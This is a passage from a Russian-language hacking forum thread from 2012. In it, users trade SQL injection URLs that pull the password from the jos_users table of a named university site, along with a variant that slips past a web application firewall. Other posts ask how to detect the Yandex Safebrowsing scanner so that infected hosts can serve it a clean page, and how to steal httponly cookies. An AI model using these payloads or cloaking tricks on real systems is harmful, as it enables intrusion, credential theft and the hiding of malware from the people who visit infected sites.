Старый 29.10.2012, 05:44   #2471
WendM
 
Аватар для WendM
 
Регистрация: 24.10.2012
Сообщений: 11
Репутация: -1
По умолчанию

Цитата:
Сообщение от Untitled Посмотреть сообщение
Похоже, фильтр реагирует на
Код:
.*FROM[^\w]jos_.*
Так что гляньте вот этот пост.
и на union+select
WendM вне форума   Ответить с цитированием
Старый 29.10.2012, 17:08   #2472
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от Flakt Посмотреть сообщение
Не выводится пароль, как обойти фильтр?

_http://os.mgsu.ru/index.php?view=videos&type=member&option=com_jomtu be&Itemid=80&limitstart=20&user_id=62+and+1=0+unio n+/*!select*/+1,2,3,4,5,6,7,8,9,10,11,12,(SELECT+password+FROM+ jos_users+LIMIT+1),14,15,16,17,18,19,20,21,22,23,2 4,25,26,27%23
somehow this 'union(select 1,2,3)' gives an error.
so you can bypass the waf like that
Код:
http://os.mgsu.ru/index.php?view=videos&type=member&option=com_jomtube&Itemid=80&limitstart=20&user_id=62 and 0 union%23aaa%0Aselect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -
spari вне форума   Ответить с цитированием
Старый 31.10.2012, 22:58   #2473
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Есть такая фишка, как Yandex Safebrowsing. Как я понимаю, работает по принципу поисковых ботов - т.е. заходит на сайт и проверяет его на предмет возможной заразы. Имеется ли у это сканера какой-то useragent, или как еще этого паука можно определить методами php? Поиск в гугле ответа не дал.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 31.10.2012, 23:30   #2474
Matthew
 
Аватар для Matthew
 
Регистрация: 14.06.2011
Сообщений: 35
Репутация: 3
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Есть такая фишка, как Yandex Safebrowsing. Как я понимаю, работает по принципу поисковых ботов - т.е. заходит на сайт и проверяет его на предмет возможной заразы. Имеется ли у это сканера какой-то useragent, или как еще этого паука можно определить методами php? Поиск в гугле ответа не дал.
Будь я разработчиком данной системы то сделал бы чтобы бот ходил пользуя разные, но при этом реальные useragent, иначе владельцы зараженных хостов просто бы выдавали мне безвредную страничку, как только бы просекли что бота можно задетектить
Matthew вне форума   Ответить с цитированием
Старый 01.11.2012, 07:09   #2475
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Matthew, зачем разные? Достаточно копировать юзерагент пользователя.

nomad, этот сэйвбраузинг делает запросы с машины пользователя или через свои сервера? Если последнее, то, думаю, способ его определения очевиден.
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 01.11.2012, 07:45   #2476
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от M@ZAX@KEP Посмотреть сообщение
Matthew, зачем разные? Достаточно копировать юзерагент пользователя.

nomad, этот сэйвбраузинг делает запросы с машины пользователя или через свои сервера? Если последнее, то, думаю, способ его определения очевиден.
Через свои. Спасибо, натолкнул на мысль пойти от обратного. А что за способ ты имел в виду?
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 01.11.2012, 09:10   #2477
Matthew
 
Аватар для Matthew
 
Регистрация: 14.06.2011
Сообщений: 35
Репутация: 3
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Через свои. Спасибо, натолкнул на мысль пойти от обратного. А что за способ ты имел в виду?
Подозреваю что отсечение по адресу отправителя запроса
Matthew вне форума   Ответить с цитированием
Старый 02.11.2012, 12:00   #2478
zuzzz
 
Регистрация: 24.02.2011
Сообщений: 75
Репутация: 7
По умолчанию

Какие еще есть способы получения кукисов с флагом httponly, кроме использования метода TRACE и вытаскивания их из phpinfo?
zuzzz вне форума   Ответить с цитированием
Старый 02.11.2012, 12:40   #2479
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от zuzzz Посмотреть сообщение
Какие еще есть способы получения кукисов с флагом httponly, кроме использования метода TRACE и вытаскивания их из phpinfo?
400-ая на Apache http://fd.the-wildcat.de/apache_e36a9cf46c.php
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 03.11.2012, 16:47   #2480
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Цитата:
Сообщение от nomad
А что за способ ты имел в виду?
Цитата:
Сообщение от Matthew
Подозреваю что отсечение по адресу отправителя запроса
Разумеется. =) Не думаю, что у него много серверов под это. Сделать пару запросов на тестовую страничку со включенным safebrowsing, посмотреть, с каких ещё ip, кроме твоего, шли запросы на эту страницу. Плохо если у яндекса окажется несколько десятков ip под это дело.

Последний раз редактировалось M@ZAX@KEP; 03.11.2012 в 16:50..
M@ZAX@KEP вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot